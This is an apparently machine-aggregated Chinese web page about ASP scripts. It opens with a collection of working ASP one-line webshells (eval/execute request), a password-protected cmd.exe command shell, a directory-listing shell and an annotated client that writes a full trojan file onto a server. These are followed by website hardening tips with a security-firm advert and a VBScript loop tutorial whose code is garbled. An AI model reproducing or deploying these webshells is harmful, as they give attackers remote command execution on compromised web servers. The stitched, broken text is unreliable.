asp脚本下载？asp程序中常用的脚本语言有

大家好，如果您还对asp脚本下载不太了解，没有关系，今天就由本站为大家分享asp脚本下载的知识，包括asp程序中常用的脚本语言有的问题都会给大家分析到，还望可以解决大家的问题，下面我们就开始吧！

超高分求 asp一句话木马~

ASP一句话木马大全！

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>"" Then Execute(Request("MH"))%>

<%if request("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>

<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval(Request.Item["MH"],"unsafe");%>

1 asp一句话木马

一句话木马服务器端

带验证:

——————————————cmd.asp————————————————

<%

if request("authkey")="pic16f873a" then

%>

<textarea readonly cols=80 rows=25>

<%response.write server.createobject("wscript.shell").exec("cmd.exe/c"&request("cmd")).stdout.readall%>

</textarea>

<%

end if

%>

带验证客户端

——————————————cmd.html————————————————

<HTML>

<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=gbk">

</HEAD>

<div align=center>

<FORM method=post name=frm target=_blank>

Host:<input type=text name=act size=65 value="http://">

<br>

<br>

Cmd:<input type=text name=cmd size=65 value="cmd">

<br>

<br>

<input type=hidden name=authkey value="pic16f873a">

<Input name=Send

onclick="Javascipt:frm.action=document.frm.act.value;

frm.submit();"

type=button value="Send Command">

</FORM>

</div>

目录浏览

服务器端

_________________________________________

<%

if request("authkey")="pic16f873a" then

szPara= Request.Form("path")

set shell=server.createobject("shell.application")

set dir1=shell.namespace(szPara)

set diritems=dir1.items

for each iii in diritems

response.write iii.path&"<font color=blue>["& iii.size&"]</font><br>"

next

end if

%>

_________________________________________

客户端

__________________________________________

<HTML>

<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=gbk">

</HEAD>

<div align=center>

<FORM method=post name=frm target=_blank>

Host:<input type=text name=act size=65 value="http://">

<br>

<br>

Path:<input type=text name=path size=65 value="C:\">

<br>

<br>

<input type=hidden name=authkey value="pic16f873a">

<Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"

type=button value="Send Command">

</FORM>

</div>

一句话木马客户端源文件：

里面涉及到一些脚本知识，我就只讲解一下功能和简单注释，不详细讲了，大家只要注意几个注意点就行了

***********************************************************

<form action= method=post>

//"action="后面是需要修改的以asp命名的数据库的提交地址

//这个标签的意思是建立一个表单以post方式提交给连接处理

<textarea name=value cols=120 rows=10 width=45>

//这里的value值根据服务端<%execute request("value")%>中value而设定

//可以自行修改成<%execute request("p")%>相应这里的value值也必须改为p

set lP=server.createObject("Adodb.Stream")//建立流对象，有了对象才可以使用它固有的属性和方法

lP.Open//打开

lP.Type=2//以文本方式

lP.CharSet="gb2312"//字体标准

lP.writetext request("joeving")//取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应

lP.SaveToFile server.mappath("wei.asp"),2

//将木马内容以覆盖文件的方式写入wei.asp

//2就是已覆盖的方式，这里的wei.asp也是可以自己定义的，如定义成1.asp

//但和下面的response.redirect"wei.asp"中wei.asp的保持一致

lP.Close//关闭对象

set lP=nothing//释放对象

response.redirect"wei.asp"//转向生成的wei.asp和上面的wei.asp相对应，也就是你熟悉的asp木马登陆界面

</textarea>

//这段程序的功能：利用插入到数据库文件的<%execute request("value")%>这段代码执行第一个textarea中的内容，并将添加的木马内容写入和指向wei.asp，这样就相当于在服务器上建立了个asp木马文件，这样就可以取得webshell了

<textarea name=joeving cols=120 rows=10 width=45>添入生成木马的内容/textarea><BR><center><br>

//这段标签是你用来添加木马内容用的

<input type=submit value=提交>

</form>

***********************************************************

//程序的主要框架是

<form>

<textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示

<textarea></textarea>//添加木马内容用的

</form>

其实都是些很简单的一些html和asp的知识，大家不妨自己写个自己的木马客户端~~~呵呵

如何防止asp数据库databass被下载

建站一段时间后总能听得到什么什么网站被挂马，什么网站被黑。好像入侵挂马似乎是件很简单的事情。其实，入侵不简单，简单的是你的网站的必要安全措施并未做好。

有条件建议找专业做网站安全的sine安全来做安全维护。

一：挂马预防措施：

1、建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。

2、对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。这其中包括各种新闻发布、商城及论坛程

序，只要可以上传文件的asp都要进行身份认证!

3、asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。

4、到正规网站下载asp程序，下载后要对其数据库名称和存放路径进行修改，数据库文件名称也要有一定复杂性。

5、要尽量保持程序是最新版本。

6、不要在网页上加注后台管理程序登陆页面的链接。

7、为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过ftp上传即可。

8、要时常备份数据库等重要文件。

9、日常要多维护，并注意空间中是否有来历不明的asp文件。记住：一分汗水，换一分安全!

10、一旦发现被入侵，除非自己能识别出所有木马文件，否则要删除所有文件。

11、定期对网站进行安全的检测，具体可以利用网上一些工具，如sinesafe网站挂马检测工具！

二：挂马恢复措施：

1.修改帐号密码

不管是商业或不是，初始密码多半都是admin。因此你接到网站程序第一件事情就是“修改帐号密码”。帐号

密码就不要在使用以前你习惯的，换点特别的。尽量将字母数字及符号一起。此外密码最好超过15位。尚若你使用

SQL的话应该使用特别点的帐号密码，不要在使用什么什么admin之类，否则很容易被入侵。

2.创建一个robots.txt

Robots能够有效的防范利用搜索引擎窃取信息的骇客。

3.修改后台文件

第一步：修改后台里的验证文件的名称。

第二步：修改conn.asp，防止非法下载，也可对数据库加密后在修改conn.asp。

第三步：修改ACESS数据库名称，越复杂越好，可以的话将数据所在目录的换一下。

4.限制登陆后台IP

此方法是最有效的，每位虚拟主机用户应该都有个功能。你的IP不固定的话就麻烦点每次改一下咯，安全第一嘛。

5.自定义404页面及自定义传送ASP错误信息

404能够让骇客批量查找你的后台一些重要文件及检查网页是否存在注入漏洞。

ASP错误嘛，可能会向不明来意者传送对方想要的信息。

6.慎重选择网站程序

注意一下网站程序是否本身存在漏洞，好坏你我心里该有把秤。

7.谨慎上传漏洞

据悉，上传漏洞往往是最简单也是最严重的，能够让黑客或骇客们轻松控制你的网站。

可以禁止上传或着限制上传的文件类型。不懂的话可以找你的网站程序提供商。

8. cookie保护

登陆时尽量不要去访问其他站点，以防止 cookie泄密。切记退出时要点退出在关闭所有浏览器。

9.目录权限

请管理员设置好一些重要的目录权限，防止非正常的访问。如不要给上传目录执行脚本权限及不要给非上传目录给于写入权。

10.自我测试

如今在网上黑客工具一箩筐，不防找一些来测试下你的网站是否OK。

11.例行维护

a.定期备份数据。最好每日备份一次，下载了备份文件后应该及时删除主机上的备份文件。

b.定期更改数据库的名字及管理员帐密。

c.借WEB或FTP管理，查看所有目录体积，最后修改时间以及文件数，检查是文件是否有异常，以及查看是否有异常的账号。

网站被挂马一般都是网站程序存在漏洞或者服务器安全性能不达标被不法黑客入侵攻击而挂马的。

网站被挂马是普遍存在现象然而也是每一个网站运营者的心腹之患。

您是否因为网站和服务器天天被入侵挂马等问题也曾有过想放弃的想法呢，您否也因为不太了解网站技术的问题而耽误了网站的运营，您是否也因为精心运营的网站反反复复被一些无聊的黑客入侵挂马感到徬彷且很无耐。有条件建议找专业做网站安全的sine安全来做安全维护。

ASP脚本循环语句

在本文上两篇中，我们学习了脚本语言 VBScript的变量、函数、过程和条件语句，本篇将继续给大家介绍 VBScipt的循环语句，并对脚本语言在 ASP中的应用加以总结。

如果有人告诉你学习 ASP不需要任何编程知识，那么他错了；如果我告诉你学习 ASP必须掌握一门编程语言，那么我错了。ASP动态服务器页面环境的特点就在于它是通过一种或几种脚本语言而写成的，脚本语言可以看作是编程语言的简化版，它易于学习和掌握，这给广大动态网站的设计者们提供了相当大的便利。可以这么说:脚本语言运用的得当与否直接关系到 ASP应用程序的优与劣。继上一篇我们学习了脚本语言 VBScript的函数和条件语句后，今天我们继续来看看 VBScript中的循环语句。

循环语句的作用就是重复执行程序代码，循环可分为三类：一类在条件变为“假”之前重复执行语句，一类在条件变为“真”之前重复执行语句，另一类按照指定的次数重复执行语句。在 VBScript中可使用下列循环语句：

Do...Loop:当（或直到）条件为“真”时循环。

While...Wend:当条件为“真”时循环。

For...Next:指定循环次数，使用计数器重复运行语句。

For Each...Next:对于集合中的每项或数组中的每个元素，重复执行一组语句。

我们先来看看 Do...Loop，它是可以多次（次数不定）运行语句块。当条件为“真”时或条件变为“真”之前，重复执行语句块。请看下例：

html head

titleDoLoop.asp/title body bgcolor="#FFFFFF"/head p/p

p请将今年到本月为止的每个月份的销售结算记录填写在本页之上。 P

%

counter= 1

thismonth= month(now())

Do while counter

thismonth+ 1

response.write""

counter

"月份:"

response.write"______________________________"

" BR br"

If counter 13 then

exit do

end if

counter= counter+1

Loop

%

hr/body/html

这段 ASP程序运用循环语句制作了一张销售结算记录表，将以上代码剪贴至记事簿保存为 DoLoop.asp，并在浏览器中以 HTTP方式进行浏览，根据当前的月份的不同，你将看到如下图的结果。

我们来分析一下此段程序，我们的目的是要根据当前的月份打印一张表格，首先我们建立一个计数器“count”并将其值设为 1，然后我们用函数 month()和now()得到当前的月份，最后建立循环，当 count的值小于当前月份的值加 1的时候，即显示月份值及一条横线并将 count的值加 1，循环语句重复执行直到以上条件为假时退出循环。其中如果 count大于 13则用 exit do立即退出循环。

Do Loop语句还可以使用以下语法：

Do

[statements][Exit Do]

[statements]Loop [{While| Until} condition]

While...Wend语句是为那些熟悉其用法的用户提供的。但是由于 While...Wend缺少灵活性，所以建议最好使用 Do...Loop语句。下面我们来看看 For Next语句。For...Next语句用于将语句块运行指定的次数，在循环中使用计数器变量，该变量的值随每一次循环增加或减少。

下面的示例将过程 MyProc重复执行 50次。For语句指定计数器变量 x及其起始值与终止值。Next语句使计数器变量每次加 1。

Sub DoMyProc50Times()

Dim x

For x= 1 To 50

MyProc

Next

End Sub

关键字 Step用于指定计数器变量每次增加或减少的值。在下面的示例中，计数器变量 j每次加 2。循环结束后，total的值为 2、4、6、8和 10的总和。

Sub TwosTotal()

Dim j, total

For j= 2 To 10 Step 2

total= total+ j

Next

MsgBox"总和为"

total

"。"

End Sub

要使计数器变量递减，可将 Step设为负值。此时计数器变量的终止值必须小于起始值。在下面的示例中，计数器变量 myNum每次减 2。循环结束后，total的值为 16、14、12、10、8、6、4和 2的总和。

Sub NewTotal()

Dim myNum, total

For myNum= 16 To 2 Step-2

total= total+ myNum

Next

MsgBox"总和为"

total

"。"

End Sub

Exit For语句用于在计数器达到其终止值之前退出 For...Next语句。因为通常只是在某些特殊情况下（例如在发生错误时）要退出循环，所以可以在 If...Then...Else语句的 True语句块中使用 Exit For语句。如果条件为 False，循环将照常运行。

最后，让我们来看看 For Each...Next语句,For Each...Next循环与 For...Next循环类似。For Each...Next不是将语句运行指定的次数，而是对于数组中的每个元素或对象集合中的每一项重复一组语句。这在不知道集合中元素的数目时非常有用。它的语法如下：

For Each element In group

[statements]

[Exit For]

[statements]Next [element]

如果 group中有至少一个元素，就会进入 For Each块执行。一旦进入循环，便首先对 group中第一个元素执行循环中的所有语句。只要 group中还有其他的元素，就会对每个元素执行循环中的语句。当 group中没有其他元素时退出循环，然后从 Next语句之后的语句继续执行。

至此，我们已经完成了对脚本语言 VBScript所有的基本知识的学习，但是仅凭阅读现有的这几篇文章你是无法熟练运用 VBScript的，你必须通过不断的实践来提高自己的等级。当然，如果你熟悉 C，你也可以选择JavaScript来作为 ASP应用程序的脚本语言。不知大家有没有发现 ASP程序的调试比较困难，因为没有什么现成的工具，在这里我向大家简要介绍一下 Microsoft Script Debugger，我们可以运用它来进行一定量的程序调试工作。

IIS4.0所包括的 Microsoft Script Debugger（Script侦错工具），提供脚本程序的侦错功能。您可以使用 Microsoft Script侦错工具来进行对使用 VBScript、JScript编写的脚本程序，以及 Java applets、beans和 ActiveX组件的侦错工作。

有的脚本程序在用户端浏览器执行，有的脚本程序（%%中的部份）在服务器端执行。Microsoft Script Debugger，可以侦错用户端执行的脚本程序以及服务器端执行脚本程序。

在用户端浏览器执行的脚本程序是在用户端的浏览器当中执行，包括在标准 HTML代码中的 VBScript、Jscript部份。在浏览器载入此 HTML代码或譬如按下按钮触发事件时，将执行此包括脚本程序的 HTML代码。用户端浏览器执行的脚本程序，主要用于对 HTML表单输入的基本检查等功能。

在服务器端执行的脚本程序是在 IIS服务器端执行，包括在.asp程序中。先在 IIS服务器上执行，执行结果产生标准的 HTML代码，再传送到用户端浏览器。服务器端执行的脚本程序，主要用于多个网页之间的连结，HTML表单输入的处理，以及存取服务器上数据库的资料等。

Microsoft Script Debugger提供以下的除错功能：

1、设定中断点

2、逐步追踪脚本程序。

3、设定书签。

4、检视呼叫堆叠。

5、检视和更改变数值。

6、执行脚本指令。

从下一篇开始，我们将开始学习 ASP的内建对象，敬请关注。

asp脚本下载和asp程序中常用的脚本语言有的问题分享结束啦，以上的文章解决了您的问题吗？欢迎您下次再来哦！